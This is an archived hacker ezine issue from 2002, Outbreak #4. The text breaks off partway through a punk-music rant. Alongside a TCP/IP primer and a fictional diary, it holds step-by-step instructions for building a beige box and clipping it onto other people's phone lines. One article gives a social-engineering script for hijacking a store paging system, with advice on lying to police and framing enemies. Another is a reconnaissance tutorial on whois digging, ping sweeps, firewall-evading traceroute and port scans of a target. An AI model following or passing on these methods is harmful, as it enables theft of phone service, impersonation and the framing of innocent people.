💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › OUTBREAK › outb… captured on 2022-01-08 at 16:56:16.
View Raw
More Information
⬅️ Previous capture (2021-12-04)
-=-=-=-=-=-=-
�����������������������������������������������������������������������������������
۱������������������������������������������������������������������������۱�������
۲������|\_______________________________________________________________/|��������
۲������||\_____________________________________________________________/||��������
۲������||| __ ____ __ __ |||��������
۲������||| /\ \__/\ _`\ ---The E-Zine--- /\ \/\ \ |||��������
۲������||| ___ __ _\ \ ,_\ \ \L\ \ _ __ __ __ \ \ \/'/' |||��������
۲������||| / __`\/\ \/\ \ \ \/\ \ _ <_/\`'__Y'__`\ /'__`\\ \ , < |||��������
۲������||| /\ \L\ \ \ \_\ \ \ \_\ \ \L\ \ \ \/\ __//\ \L\.\\ \ \\`\ |||��������
۲������||| \ \____/\ \____/\ \__\\ \____/\ \_\ \____\ \__/.\_\ \_\ \_\ |||��������
۲������||| \____/ \/___/ \/__/ \/___/ \/_/\/____/\/__/\/_/\/_/\/_/ |||��������
۲������|||_____________________________________________________________|||��������
۲������||/_____________________________________________________________\||��������
۲������|/_______________________________________________________________\|��������
۱������������������������������������������������������������������������`amatier�
�����������������������������������������������������������������������������������
Outbreak Magazine Issue #4
April 2002 Release
"Hey, this is Davies. Who just joined the conference?'"
- Davies
Editorial:
Welcome to Outbreak #4. I think it's a pretty good issue. A lot of
people helped us out with this issue. And I thank you all.
We are always looking for articles. So if you have something written
and don't mind a bunch of people reading what you wrote. Then send
your text our way. The more texts the better. Send all articles to:
kleptic@outbreakzine.net
Check out our new website at: http://www.outbreakzine.net
Hope you all enjoy #4. Start sending your texts for #5.
Enjoy!
- kleptic <kleptic@outbreakzine.net>
۰�������������������۲�����Staff������������۲�����������
�
� kleptic...............<kleptic@outbreakzine.net> �
� fwaggle...............<root@fwaggle.net> �
� `amatier..............<amatier@twcny.rr.com> �
� antimatt3r............<antimatt3r@hotmail.com> �
� Strykar...............<strykar@hackerzlair.org> �
� Prodigal|Son..........<amlouden@insightbb.com> �
� Ryan..................<ryan@insidergaming.net> �
� Radioactive_Raindeer..<r_r@diegeekdie.org> �
� timeless..............<timeless@timeless.co.zw> �
� `Enigma...............<enigm4@freeshell.org> �
� skwert................<skwert@cyberspace.org> �
� dropcode..............<dropcode@outbreakzine.net> �
� Meggito...............<meggito@hotmail.com> �
� BadGadget.............<badgadget@molested.net> �
� Turbanator............<turbanator2k2@roy.phonelosers.org>�
� �
۰�������������������۲���������𰲲���������۲�����������
Shout Outs:
All @ #hackerzlair on irc.dal.net,
RBCP at phonelosers.org, scene.textfiles.com,
diegeekdie.org, hackerzlair.org, fwaggle.net,
dsinet.org, ameriphreak.com, surviveall.net,
roy.phonelosers.org, #outbreakzine on irc.dal.net,
Everyone that helped out with this issue of
Outbreak. You all rule!
������������������������������������
\-� www.outbreakzine.net �-/
������������������������������������
Vist Us @ IRC.DAL.NET
Join #outbreakzine
Send all articles for submission to:
kleptic@outbreakzine.net
���������������������������������������������������������������������������������
� Outbreak Issue #4 �
� �� ���������������������������������������������������������������� ��� �
� � � �
� � [ 0] Editorial...............................kleptic � �
� [ 1] TCP/IP part 3...........................antimatt3r �
� [ 2] The anTrojan Filez 3....................Timeless �
� [ 3] Beige Boxing............................antimatt3r �
� [ 4] Phreaking Do's and Dont's...............Turbanator �
� [ 5] Network Reconnaissance..................dropcode �
� [ 6] A Rant About "Try-Hard Punk Kids".......fwaggle �
� [ 7] Number Systems and Binary Math..........meggito �
� [ 8] nix console.............................amatier �
� [ 9] That's your real name!?.................BadGadget �
� [10] A Short Text On Web Browers For Linux...Prodigal|Son �
� [11] It Doesn't Do What It Says On The Tin...Timeless �
� [12] Conclusion..............................kleptic �
�� ��
���� ����
����������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
-���������������������۲������-|O|u|t|b|r|e|a|k|𰰰������������������۲�����-
+-+-+-+-+-+-+-+-+
����������������������������������������������������������������ij
All information provided in official OutBreak Zine, Web sites is provided for....
information purposes only and does not constitute a legal contract between the....
Editors or Writers and any person or entity unless otherwise specified............
Information on official OutBreak Zine web sites is subject to change without......
prior notice. Although every reasonable effort is made to present current and.....
accurate information, the Editors and Writers make no guarantees of any kind......
The OutBreak web site may contain information that is created and maintained
by a variety of sources both internal and external to the Staff. These sites are..
unmoderated containing the personal opinions and other expressions of the persons.
who post the entries. OutBreak does not control, monitor or guarantee....
the information contained in these sites or information contained in links to other
external web sites, and does not endorse any views expressed or products or.......
services offered therein. In no event shall OutBreak be responsible or...
liable, directly or indirectly, for any damage or loss caused or alleged to be....
caused by or in connection with the use of or reliance on any such content, goods,
or services available on or through any such site or resource.....................
Any links to external Web sites and/or non-OutBreak information provided on......
OutBreak pages or returned from Any Web search engines are provided as a..........
courtesy. They should not be construed as an endorsement by OutBreak and..........
of the content or views of the linked materials...................................
COPYRIGHT AND LIMITATIONS ON USE :
OutBreak Contents may not be used with out express written permission........
By the Editor..........kleptic@outbreakzine.net.................................
COPYRIGHT�� 2002.
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 1 of 12
�������������������������������������������������������������ij
Hello folks this is TCP/IP part 3 by antimatt3r. ENJOY!
Client / server is defined by software, not hardware. The client application
on one computer requests services from a computer running server software.
Client / server software can run on any hardware.
Server computers have a recource it shares with other computers, or a
service it can perform on behalf of other computers and users. A web server
sends files and images to a web browser (client). A web server on a private
intranet is an internal information server. A commerce server lets you
conduct buisness over the web. The server software includes security
features such as Secure Socket Layer (SSL). A file server shares its disk
space with other computers, when there are multiple operating systems; there
are various file formats. The server hides those format differences from the
clients. Software converts the format. This is called "transparent file
access." A compute server is a computer that will run a program for you.
Client is a computer that borrows a service or recource from another
computer. A thin client is the smallest, lightest, and least expensive
configuration of hardware and software configured to perform the exact tasks
you need, nothing more, nothing else. Thin client means fat server. A
browser recieves information from a web server. Some smart cell phones are
thin clients and have a microbrowser that knows how to display information
on the phone screen.
Most computers in a peer to peer network act as both clients and servers
simultaneously. When browsing the web the browser (client) pulls information
down from the server. Server push technology is just the opposite - the
server initiaites the information delivery to the client. Delivery of E-mail
is the most common push technology solution. Nowadays, content that is
pushed is streaming audio and video.
The United States has 6 network access points.
New York - Operated by Pacific Bell
Bohemiany - Operated by ICS
Chicago - Operated by Ameritech
San Hose and MAE West - Operated by Worldcom
San Francisco - Operated by Pacific Bell
For maps of backbones visit http://www.nthelp.com/maps.htm
An intranet is a private network within an organization or department, a
private version on the Internet. Extranets are multiple interconnected
intranets and internets. For example, a university in the East may want to
share information with a university in the West; they hook together with an
extranet.
So who is in charge of all of this you wonder? They say that no one
controls TCP/IP but there are several organizations that influence TCP/IP
and its direction, as well as Internet policies:
InterNIC: Internet Network Information Center keeps lists or domains
IANA: Internet Assigned Numbers Authority is the central control for
Internet addresses, domain names, and other protocol details. IANA maintains
a database of top level domains, for all countries.
ICANN: Internet Corporation for Assigned Names and Numbers Association was
incorporated in late 1990s, is taking the IANAs job over.
IAB: Internet Activities Board defines architecture for the Internet
backbone and all the networks that link to the backbone. The IAB oversees
TCP/IP. They have a committee that works together to solve problems with
Internet growth problems. They work with all the following committees to set
the direction for research and the development of the Internet.
IETF: Internet Engineering Task Force is responsible for keeping the
Internet running. 70 groups make up the IETF. The groups develop standards
for TCP/IP. They manage the growth and change of TCP/IP and the Internet.
IESG: Internet Engineering Steering Group sets the stretegic goals for the
Internet. IAB appoints the chairperson and members. The IETF makes makes
recommendations to the IESG about standardizing TCP/IP protocol for the
Internet. The IESG manages how a protocol becomes an Internet standard. IESG
oversees the IETF.
IRTF: Internet Research Task Force manages research into protocols. The IETF
moves the IRTFs research into the practical world of TCP/IP and the
Internet.
ISOC: IAB, IETF and IRTF are part of ISOC which guides the future of the
Internet, members are people, companies, international and government
organizations.
W3C: World Wide Web Consortium. The W3C decides on which standards to adopt
for the Web and its protocols.
The Internet is close to reaching the limits of its current address
numbering system. Although estimates vary, the average figure for when we
will run out of addresses is around 2010, that�s not too far away.
If the Internet is close to running out of addresses, that does not mean
that soon it wont be able to accept new companies and individuals. The IESG
created a task force to determine how to best enhance TCP/IP to cope with
this problem. IPv6 to the rescue.
IPv6 is the next generation of IP, it offers millions and millions more of
Internet addresses than we have now. Software vendors must develop products
to cope with and understand the new addressing scheme. Some products are
already in place. IPv6 also has some other �goodies� besides making
addresses more abundant, like making it easier to assign addresses,
increased cryptologic capabilities and advanced support for mobile devices.
The current version of IP is IPv4. IPv5 was a research version that never
made it to production.
In order for IPv6 to provide more addresses, it needs to change the
addressing format. It works like an area code to phone numbers. The Ipv6
task force mandates that old style IP addresses and new Ipv6 addresses must
coexist. The transition from version 4 to version 6 will be slow and
gradual, over the next few years. We can also be sure that the Internet will
understand both forms of IP addresses for years to come. Read RFC 1883 for
additional information on IPv6.
ISO: International Standards Organization specifies worldwide standards for
different types of computing, sets standards for networking, database, and
charachter sets, among other things.
OSI: Open Systems Interconnect defines network architecture and a full set
of protocols
OSIs interoperability standards have been designed to allow all parts of
your network to work together. OSI divides network functions, (for example
getting connected or sending mail), into layers and specifies how those
layers interact.
The ISO OSI seven layer stack:
Each layer provides services to the layer above it. In other words, each
layer depends on the layer beneath it. When 2 peer computers are
communicating, each PC has its own set of layers. When you send a message to
another computer on the network, its starts at the top of the stack on youre
computer, travels down and jumps to the other computer. When the information
gets to the other computer it starts at the bottom layer and works its way
up the stack to the top, application layer. LOWer layers are hardware
orientated, HIGHer layers do thing such as email, and file transfers and are
software related.
Layer 1 - The Physical Layer: This is the bottom of the stack, purely
hardware, including the connection medium and the NIC.
Layer 2 - The Data Link Layer: Hardware involved, splits data into packets
to be sent. When the information gets on the wire, the data link layer
handles any interference.
Layer 3 - The Network Layer: Bottom layers are about hardware, TCP/IP is
software. The network layer is the first place on the OSI model where a
TCP/IP protocol fits in. IP works at this layer. This layer gets data from
the data link layer (2) and sends it to the correct network address. If
there is more than one possible path, network layer figures the best and
fastest. Information would not get to the right place without this layer.
Layer 4 - The Transport Layer: The network layer takes your information to
its destination, but cant guarentee that it will arrive in order or not pick
up errors along the way. This is the transport layers job. TCP and UDP are
both at work here. Transport makes sure that all data arrives in order and
is error free. Without this, you couldent tusrt ouyr
neowtkr..............get it?
Layer 5 - The Session Layer: This layer establishes and cordinates a
session, the connection. After the session is established, security is
turned on.
Layer 6 - The Presentation Layer: Works with filesystem and operating
system. Files get converted from one type to another, if the server & client
use different formats. Without this, the file transfer would be limited to
computers of the same file format
Layer 7 - The Application Layer: This is the top layer where you do your
work such as sending E-mail or requesting to transfer a file across the
network. Without this layer, there is no way to create data to send, no
browsers, and your computer wouldent know what to do with information that
is sent to you.
TCP/IP's 5th layer is very rich, it combines functions session,
presentation, and application all in one layer. The third layer is the
internet layer, this is the same as OSI's network layer. The following is
the TCP/IP stack.
-Application (RPC, SNMP, FTP, TFTP, DNS, DHCP, NFS, Telnet)
-Transport (TCP, UDP)
-Internet (IP, IPv6, ICMP, ARP, RARP)
-Data link
-Physical
TCP/IP's modular, layered design makes it easy to innovate and add new
componets. If you envision a new network service, as you go about designing
the server and client applications you can simultaneously design a new
protocol to ass to the TCP/IP suite. The protocol enables the server
application to offer the service and lets the client application comsume
that service. This simplicity is a key advantage of TCP/IP.
In the fabric of a network, you find a protocol/application/service
relationship so tightly woven together that it may be difficult to
distinguish the threads in the cloth. We shall use FTP as an example of
this. FTP stands for file transfer protocol, but its not only a protocol,
its also a service and an application. (dont worry about FTP if you dont
know what it is)(then again if you dont, bin this text) FTP is service for
copying files; pull or push to a remote computer. Pull is a geek term for
download, push means upload. FTP is also an application for copying files.
You run client applications such as browsers to get files or upload, called
FTPD, FTP daemon. FTP is a protocol because client and server use it for
communication to ensure the information is bit for bit identical to the
original. Without application, a computer dosent know what to copy. Without
service, there is no connection to the remote computer, and without the
protocol computers cant communicate.
to be continued in the next issue (as usual) shoutz to #hackerzlair and all
of our outstanding outbreak krew
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 2 of 12
�������������������������������������������������������������ij
The anTrojan Filez 3
====================
The following may or may not be complete fiction. The previous sentence is here
to disable your ability to fully believe in the following material. If you did
manage to believe it fully, then the sentence would serve to stop you from
taking legal action against the author. Above all, it prepares you to be filled
with a sense of wonder at what you are about to read. Open your minds, we're
going in...
--------------------------------------------------------------------------------
"Future Spy - The Diary Revealed"
Foreword
Many people have risked their lives to obtain the following material. When you
read it you will probably begin to understand why it has been kept from public
knowledge. Imagine this power in the wrong hands. The following web page gave
these people enough information to start uncovering the mystery:
http://www.timeless.co.zw/futurespy.cfm
Onwards
Monday, February 12, 2001
I have lost my diary, so I went out and bought another today (you're reading it
now). It will probably turn up some day, I hope. If not, I think these memory
triggers will be all I need to remember what was in it: "dream diaries work!",
"when reaching for something touch it before touching it", "area of respect",
"desensitisation training to lose the ability to fear paranormal events". Today
I did some basic meditation to practice clearing my mind and then keeping it
clear for about 10 minutes each time. This will help stop my mind drifting at
the wrong time. Last time's experiences taught me a tough lesson. I am thinking
of doing two sessions per mission now just to check for consistencies.
Tuesday, February 13, 2001
Today I made a great deal of progress on the current mission. However, it's not
proving easy, especially as I don't fully understand the information given to
me yet. I see now that I am going to have to gleen the information, then spend a
lot of time researching what we already know just so that I can get a general
understanding of what they're talking about. I have made notes on the session
but will go through them in more detail tomorrow.
Wednesday, February 14, 2001
The notes I made yesterday don't seem to give the full solution to the problem.
I still can't figure out what it means when they say "a free energy can at
giving back you kinetic negative value to b... (unclear letters follow)". I'm
getting so close now, I just know it.
Thursday, February 15, 2001
I think I probably need the rest of the information to be able to get this off
the ground. Words like "dimidemeiferous" mean nothing to me. It's going to be
hard to gather the required information to do the entire process of just making
that kind of metal. Once I know that then the rest might start making sense. My
head hurts!
Friday, February 16, 2001
There is so much to decipher, and it's difficult to tell which is relevant and
which is just chatter. I mean, "elephant can dig just as well as an eagle"???!
Huh? And then I got repremanded for not being "jem" (spelling, hehe) clear.
Monday, February 19, 2001
Got an interesting message, "give I do free energy to give mankind a dose of
real need not greed". This was in reference to free energy being made freely
available when it is revealed, and that it should not be used for exploiting
others. We have to stop using fossil fuels, it can't go on like this.
Tuesday, February 20, 2001
I think someone stole my previous diary. I fear for my life, so I am going to
hide this one and stop writing and researching for a while. If only I could do
this kind of research under the protection of a greater power. I have my family
to think of. This will be my last entry.
The diary was "found" hidden in a sealed metal box in the loft. All other
documentation was not found or had been destroyed.
--------------------------------------------------------------------------------
And so it continues, as your mind gets infected by the anTrojan filez. Greetz to
all at #outbreakzine and #hackerzlair on DalNet.
- Timeless
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 3 of 12
�������������������������������������������������������������ij
^^^^^^^^^^^^^^^^
Beige Boxing
By: antimatt3r
3/26/02
^^^^^^^^^^^^^^^
1.0 legal BS
1.1 intro / matierials
1.2 fone jack beige
1.3 fone line coupler beige
1.4 prespliced wire beige (fast & easy)
1.5 what to do with your beige (for those who dont have the second material
listed below.)
1.6 outro
1.0 The information in this text is not to be used in real life, and is
intended only for educational uses. The writer or publisher of this paper is
not responsible for the results of you the reader trying the actions
described, or making the materials mentioned. (Dont do it and get cought
then blame it on this text.... Just coverin my ass here.)
1.1 Intro/matierials:
This text will be geared for those who know what a beige box is and how it
is to be used. Also, reader must have a basic understanding of the hardware
involved. What you need is the following:
1 fone jack, or phone line coupler, or prespliced fone cord with screw
terminals on the end. (those fancy half circle copper connectors.)
1 brain of an 8 year old or older.
2 alligator clips (ones with screw terminals are best, works well with the
prespliced fone cord)
Electrical tape (colors green and red for prettiness)
an ANI and a CNA number will be helpfull in youre beiging experiences.
(numbers are given below)
1.2 Method One (fone jack beige box):
Take your fone jack apart and you need the green and red wires. Once you
have the green and red wires you need to have them hanging out the box, once
they are outside the box, close it back up. Hopefully the wires are
prespliced and you wont need to splice the fone cord. If they arent,
obviously, you need to splice them. So once you have spliced green and red
wires hanging out the box, wrap the wire around the screw on each of the
alligator clips and tighten them nice and snug. You can wrap youre alligator
clip in electrical tape if you wish for insulation or color coding purposes.
When you get shocked by a fone cable, about 5 minutes later your arms start
to ache, and they hurt for about 2-4 hours. You now have a fone jack beige.
1.3 Method Two (fone line coupler beige box):
This is a nice way to make a beige in that it is nice and easy and fairly
quick. It is also small and durable. When you purchase youre coupler make
sure it is one that you can open up and then seal back together when done.
Usually they have a crack going down the center where they can be split.
Once you have your coupler open, you should have 2 plastic pieces connected
by 4 wires; green, red, yellow, and black. What you want to do is grip the
wire near the base of one side of the coupler and pull firmly to remove the
wires from the second piece of plastic. What you should have now is one
plastic piece with the 4 wires hanging out. The wires should be prespliced
and have a copper wire on the end. Take the wires (green & red) and wrap
them around the screws on the clips, tighten and your good to go.
1.4 Method Three (an easy, small, durable, stealth, wonderfull, cheap, and
quick beige box)
Go to ratshack and what you need is a fone cord thats about 6" long (the
longer the better) that has the regular jack on one side to plug into the
wall jack. (the clear plastic deal on the end of a cord) then on the other
side instead of having another jack like normal, it has the 4 wires out,
spliced, and with screw terminals on the ends of each. (the little half
circle things to connect with a screw.) So take the red and green wires, put
the connector on the screw, tighen, there ya go an easy, small. durable,
stealth, wonderfull, cheap and quick beige box.
1.5 What to do with youre shiny beige box (for the Jr. Phreakettes)
Go up to a TNI (Telefone Network Interface) or a can on the street and open
it up, you will see red and green screws that should be colored red and
green. If they are not colored, red is always on the right. Red=Right. put
your clips on, plug the fone cord into the beige (from the fone) or just
plug the cord into the fone for method 3. Dial your number you want to call.
You can get the fone line number of the line you are calling by calling an
ANI number. A few ANI numbers are: 800-444-3333, 800-444-4444 and
800-555-1140(little confusing to you 8 year olds)
holla!
shoutz to #hackerzlair and the entire outbreak crew
http://www.geocities.com/antimatt3r/
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 4 of 12
�������������������������������������������������������������ij
Phreaking Do's and Dont's
By Turbanator (turbanator2k2@roy.phonelosers.org)
Here are some basic phreaking Do's and Dont's that every phreaker should know, atleast in my opinion.
Don't phreak near Wal-Mart- Theres way to many people around, especially when theres a sale, and you can get caught very easily. I have seen this happen quite a few times to a kid who tried boxing with a CD player, man was that funny!
Do phreak Wal-Mart from home- How you ask? Simple, call up your local Wal-Mart and ask to be transfered to some lame department, like housewares. Then once the other department picks up, simply say that your (insert bogus name here) from (insert department here) and you can't get on the paging system and if they could transfer you. It should go something like this:
Them: Wal-Mart how may I help you?
You: Housewares please.
Them: One moment please.
Them: Housewares
You: Hi this is Tom from Electronics, I cant get into the paging system from this phone could you transfer me?
Them: Sure hold on.
Then bam, your in their pagin system and can say whatever you want, you can even call a Wal-Mart thats not local and mess with them. Just dont be fuckin with em for too long and you should be fine.
Don't be a dumbass!- I dont know how many times I must stress this. If a cop or another person asks you what you are doing while your boxing in your tones, say something like "Oh I was playing this song to my friend but he hung up" or something along those lines. That last quote works best if your boxing using downloaded tones on an mp3 player or CD player.
Do be a smartass!- This is another important thing too. If your out phreaking and you notice someone is watching you watch them, if they pull out a cell phone or go to a nearby payphone and start dialing then finish up whatever phreak you are doing and leave the area for a while, go get a big mac or something. That way you can be sure that the person wasnt calling the cops on you or something. I know I may sound paranid, but when it comes to things like phreaking and sex, its always best to be safe!
Don't get a total stranger in trouble- Unless they were a real asshole in the parking lot or in the movies dont go fuckin around with ops and saying all this shit only to let the next person who uses the phone to be taken away by the cops. I know it sounds soo fucking funny but its really not.
Do get your enemies in trouble- If your bored and pissed at someone you really hate, why not do a little phreaking and make it seem like they did it. Call up a 31337 BBS and act like a dumbass, during your acting try to get out the name of the person you really hate so that they get blamed for it and they might just get their phone fucked up, or worse. Be careful though, as sometimes your enemy may be smart enough to trace the shit back to you, and that can be bad.
Well I hope this has helped atleast someone. Most of these Do's and Dont's I have personally experienced and know what its like. If you have any question im at turbanator2k2@roy.phonelosers.org or try to find me on DALnet in #outbreakzine
And dont come crying to me when you get busted, its not my fault what you do with what I write. �������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 5 of 12
�������������������������������������������������������������ij
###########################################
##...network reconnaissance. -dropcode...##
###########################################
"know thy enemy..." -sun tzu, the art of war.
-----------------------------------------------------------------------
:: introduction ::
network reconnaissance involves gathering information dealing with your
targets network. though, often a gruling task, the information gleaned
with the simple techniques i will explain throughout this article will
allow an attacker to build a complete dossier against a target network.
using simple recon techniques an attacker can systematically reduce a
network from a mess of connected machines to a specific range of
domains, network blocks and ip addresses.
-----------------------------------------------------------------------
:: public database digging ::
there are generally three areas of important info that can be gleaned
from public databases related to the targets network, they are
registrar, domain and network.
registrar queries provide the attacker with specific whois / registrar
servers directly associated with the targets network. this is important
because these associated servers are where the next queries will be
directed.
in the following example, i will be performing a registrar query on
psuedo networks inc. from a bash shell. of course, the crsnic.net
server could be queried in other ways, the bash shell was only a
preference.
---
$ whois "psuedo."@whois.crsnic.net
psuedostuff.com
psuedosomethin.com
psuedo.net
psuedopsuedo.org
---
placing the . wildcard at the end of my search string forced the server
to return all occurances of psuedo in the crsnic.net database. we can
now dig deeper to determine which domain is the one we want. i would
guess that psuedo.net is our best chance.
---
$ whois "psuedo.net"@whois.crsnic.net
Domain Name: PSUEDO.NET
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: DNS1.PSUEDO.NET
Name Server: DNS2.PSUEDO.NET
---
blamo. from that query we see that whois.networksolutions.com is the
server we should direct our next queries at.
the domain query will provide us with information relating to the
registrant, the domain name, admin, when the record was last updated
and the primary and secondary dns servers (also aquired from the
first query)
---
$ whois psuedo.net@whois.networksolutions.com
[whios.networksolutions.com]
Registrant:
Psuedo Networks, Inc. (PSUEDO-DOM)
123 nowhere ave.
Buttfsck, AZ 12345
Domain Name: PSUEDO.NET
Administrative Contact, Technical Contact, Zone Contact:
Rick, Slick [Network do0d] (SR924) slickrick@PSUEDO.NET
710-555-1234 (fax) 710-555-1235
Record last updated on 30-Mar-02.
Record created on 30-Mar-02.
Database last updated on 10-Mar-02.
Domain servers in listed order:
DNS1.PSUEDO.NET 10.10.10.1
DNS2.PSUEDO.NET 10.10.10.2
---
the word record refers to the information stored in the whois database.
if the record was created years ago and hasn't been updated, its quite
possible that the information in the record is out of date. but if
the update is recent we've aquired a wealth of information on our mark.
lastly, the network query. american registry of internet numbers [arin]
maintains actual network blocks and ownership information in a gorga-
massive database. we will use whois to query the arin database:
---
$ whois "Psuedo Networks."@whois.arin.net
[whois.arin.net]
Psuedo Networks (NETBLK) 10.10.10.0 - 10.50.129.255
---
a tighter search can be made using a netblock as our search string.
---
$ whois 10.10.10.0@whois.arin.net
[whois.arin.net]
Some Big Backbone (NETBLK NA-05BLK) 10.10.0.0 - 10.10.255.255
Psuedo Networks (NETBLK NA-10-10-10-) 10.10.10.0 - 10.50.129.255
---
basically, arin.net's database has given us a network block owned by
psuedo networks, inc. thereby providing the attacker with a basic map
of systems to target.
-----------------------------------------------------------------------
:: ping sweeping ::
ping sweeping is a very simple, but quite versatile technique used to
determine which ip's in a given network block are actually live
machines.
the basic concept is to ping a range of ip's, compiling a list of the
ones that respond. for instance, psuedo networks own a class c
netblock ranging from 10.10.10.0 to 10.50.129.255. at first glance this
seems likely to be a long gruling process, and often it is, especially
if you're mapping a larger class a type netblock. however, there is a
simple technique to quicken the process. there are a few programs out
that, instead of pinging each system subsequently, send out all the
pings at once and idle waiting for the replies. this speeds up the
process significantly.
generally, pinging a host sends an icmp echo packet (icmp type 0x08)
and waits for an icmp echo_reply packet (icmp type 0x00). this method
is sometimes erroneous due to the fact that acd's are often configured
to filter icmp packets. it is possible to use a similar method to see
if a system is alive called the tcp ping. this methed sends a tcp ack
to the system and waits for an rst, showing that the system is infact
alive.
gping/fping/hping are very handy *nix programs capable of ping sweeping
a network block.
-----------------------------------------------------------------------
:: traceroute/tracert ::
using traceroute it is possible to find firewalls, packet filtering
devices and other access control devices [acd] on the target network.
---
$ traceroute psuedo.net
traceroute to psuedo.net (10.10.10.1), 30 hops max, 40 byte packets
1 box1 (207.124.10.1) 5.133 ms 5.101 ms 5.111 ms
2 rtr1.bigbackbone.net (10.10.22.10) 40.103 ms 40.210 ms 41.122 ms
3 rtr2.bigbackbone.net (10.10.22.11) 43.123 ms 43.163 ms 43.211 ms
4 acd.bigbackbone.net (10.10.11.11) 45.533 ms 45.364 ms 47.164 ms
5 box.psuedo.net (10.10.10.1) 47.733 ms 47.103 ms 47.603 ms
---
generally, it is safe to assume that the last hop before an important
machine on the targets network is some form of acd on their isp's
network. this acd can be anything from a physical hardware firewall to
a simple packet filtering device or router. in the above example, hop
four is likely an acd.
traceroute generally uses udp packets by default allowing the user to
switch to icmp if they feel if necesary at the command line. (the
reverse is true for tracert users) often acd's will filter icmp
or udp packets and give you output such as:
---
$ traceroute psuedo.net
traceroute to psuedo.net (10.10.10.1), 30 hops max, 40 byte packets
1 box1 (207.124.10.1) 5.133 ms 5.101 ms 5.111 ms
2 rtr1.bigbackbone.net (10.10.22.10) 40.103 ms 40.210 ms 41.122 ms
3 rtr2.bigbackbone.net (10.10.22.11) 43.123 ms 43.163 ms 43.211 ms
4 acd.bigbackbone.net (10.10.11.11) 45.533 ms 45.364 ms 47.164 ms
5 * * *
6 * * *
---
it is possible that switching the type of packets traceroute/tracert
sends might bypass this form of acd filtering. also, it is possible to
use the -p switch to specify a starting udp port in conjunction with
the -S switch to stop port incrementation. generally, traceroute will
start at the port specified with -p and increment +1. with -S switch
you can specify a port and keep all packets sending there. for instance
udp port 53 handles dns queries. since most acd's allow inbound dns
queries, its very likely that if you point your traceroute to 53, it
will bypass the acd's filtering and allow you to see beyond the acd.
-----------------------------------------------------------------------
:: port scanning ::
once you have a list of operational systems on your targets network you
can begin looking for vulnerable services on each individual system.
this can be accomplished by connecting to every tcp/udp port on the
victims machine to determine which ports are set in listening state.
if a port is listening, there's a good chance that there is a service
daemon running on that machine handling connections to that port. and
if there's a daemon running, there's a chance that it's vulnerable.
for instance, http daemons, or webservers generally run on port 80. if
port 80 is listening, its quite likely that the target machine is
running a webserver.
-tcp full connection scan:
-------------------------
the most common type of port scan is the tcp full connection scan.
this type of scan completes a threeway handshake, syn, syn/ack, ack.
this method is easily detectable but, with this method it is possible
to grab the daemons banner which often includes the name and version
of the running service.
-tcp syn scan:
-------------
the tcp syn scan is a little more stealthy because a full connection
is never made. the downside is that with a syn scan banners cannot be
retrieved. however, an attacker can make an educated guess as to what
service is running on the port because all services have a default.
(httpd:80, ftpd:21, telnetd:23, smtpd:25, etc)
-tcp ack scan:
-------------
this method can help in determining what types of packets are filtered
by an acd. the tcp ack bit is set before the packet is sent to see if
the acd filters packets without this bit set.
-tcp fin scan:
-------------
fin packets are sent to the target system on every port subsequently.
all closed ports should reply with rst's according to the standards of
the tcp protocol.
-tcp xmas scan:
--------------
an advanced version of the fin scan, the xmas method sends fin, urg
and push packets also forcing rst's from all closed ports.
-tcp null scan:
--------------
a tcp null scan sends packets to the target machine with no bits set.
this forces all closed ports to respond with an rst.
-udp scan:
---------
the basic principal of a udp scan is that when no icmp port
unreachable msg is recieved, the port must be listening.
-----------------------------------------------------------------------
:: outro ::
well, thats about it for network recon. any questions or comments can
be emailed to me at uberego@hotmail.com ...
respect to: gr3p, rambo, adeamis, smurf, fork, smiley, antimatt3r,
gambiit, ocean, ech0. droptone: dood, it looks so much
better on me :P, abused: xoxoxxx, heather: can't we all
jus' get along? kleptic: don't give up on outbreak, dood
people need you. :) honeypot: i lub j0o.
... anyone I'm forgetting, meh. :)
EOF.
-----------------------------------------------------------------------
�������������������������������������������������������������ij
+-+-+-+-+-+-+-+-+
��������۲�������������|O|u|t|b|r|e|a|k|𰰰�����������������
+-+-+-+-+-+-+-+-+
Issue #4 - Page 6 of 12
�������������������������������������������������������������ij
Hey Ho! Let's Go! (a rant about try-hard punk kids)
---------------------------------------------------
By: fwaggle
I have a beef with many of what i would call "try-hard" punks out there.
since punk seems to be coming cool among junior high kids and the like -
quite possibly due to the growing popularity of skateboarding and other
extreme sports on tv - i've noticed an al arming trend.
there's a lot of people out there, who when asked if they like a particular
song, particularly those on the radio and the like, will say "no, it's not
punk" or "no, it's on the radio".. i didn't ask if it was punk, or on the
radio, i asked if you liked it you fucking neanderthal.. i was inquiring
as to whether or not you found it catchy... if it were played at a show you
were at, would you dive into the mosh pit to it?
don't get me wrong, i hate the radio and mtv as much as the next punk..
they repeat songs to death, and they ignore many of the cooler bands out
there. but there comes a point when that attitude just becomes silly..
while i do hate mtv (i think the only decen t show on there was daria heh),
i do find a couple of mainstream songs catchy.. for example, i do like a
bit of blink 182 every now and then.
then you get these "wannabe hardcore" punks who talk shit about not being
"hardcore" because you happen to listen to __________ by _________ and they
were on MTV last night... they talk about being brainwashed by mass
marketing, but i ask you this.. who's bra inwashed? music is about what
sounds good, not what fits into your own little idea of what you and all
your friends should like..
the very idea of punk to me is that i don't want to be labeled and
seggregated into some group classification, i am me. you are you. if we
happen to like the same band and the same songs by that band and said band
tours into our town then we'll go and have a riot. if not, we both deal
with it.
i think it's ironic that these try-hards are so preoccupied trying to be
part of this cool group who doesn't care what people think, that they
actually start to worry about whether or not people think they're part of
that group (if that makes any sense to you ).
for fuck's sake, i went and saw that britney spears movie on opening night
